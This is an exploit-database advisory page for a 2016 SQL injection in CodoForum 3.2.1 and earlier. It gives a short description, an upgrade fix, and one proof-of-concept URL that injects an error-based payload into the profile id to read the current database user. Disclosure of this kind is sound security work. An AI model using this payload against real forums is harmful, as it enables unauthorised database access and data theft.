CodoForum - exploit.company

vendor:

CodoForum

by:

Yakir Wizman

CVSS

CRITICAL

SQL Injection (Critical/High)

CWE

Product Name: CodoForum

Affected Version From: Prior to 3.2.1

Affected Version To: 3.2.1

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu (Apache) | PHP 5.5.9 | MySQL 5.5

2016

CodoForum <= 3.2.1 Remote SQL Injection Vulnerability

The script that parses the request URL and displays user profile depending on the retrieved id does not use proper input validation against SQL injection.

Mitigation:

Upgrade to the latest version v3.4 build 19.

Source

Exploit-DB raw data:

1. Advisory Information
========================================
Title			: CodoForum <= 3.2.1 Remote SQL Injection Vulnerability
Vendor Homepage		: https://codoforum.com/
Remotely Exploitable	: Yes
Versions Affected	: Prior to 3.2.1
Tested on		: Ubuntu (Apache) | PHP 5.5.9 | MySQL 5.5
Vulnerability		: SQL Injection (Critical/High)
Date			: 23.07.2016
Author			: Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
 
 
2. CREDIT
========================================
This vulnerability was identified during penetration test by Yakir Wizman
  

3. Description
========================================
The script that parses the request URL and displays user profile depending on
the retrieved id does not use proper input validation against SQL injection.


4. TECHNICAL DETAILS & POC
========================================
SQL Injection Proof of Concept
----------------------------------------
Example for fetching current user database:
http://server/forum/index.php?u=/user/profile/1%20AND%20(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT((MID((IFNULL(CAST(CURRENT_USER()%20AS%20CHAR),0x20)),1,451))))s),%208446744073709551610,%208446744073709551610)))


5. SOLUTION
========================================
Upgrade to the latest version v3.4 build 19